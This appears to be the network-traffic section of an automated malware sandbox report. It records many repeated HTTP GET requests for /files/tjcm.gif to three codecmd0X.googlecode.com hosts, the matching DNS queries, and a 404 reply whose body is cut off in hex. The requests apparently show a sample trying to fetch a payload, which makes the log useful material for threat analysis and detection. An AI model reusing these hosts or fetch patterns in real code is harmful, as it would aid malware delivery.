                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: codecmd01.googlecode.com
                      Source: global trafficDNS traffic detected: DNS query: codecmd02.googlecode.com
                      Source: global trafficDNS traffic detected: DNS query: codecmd03.googlecode.com
                      Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:02 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 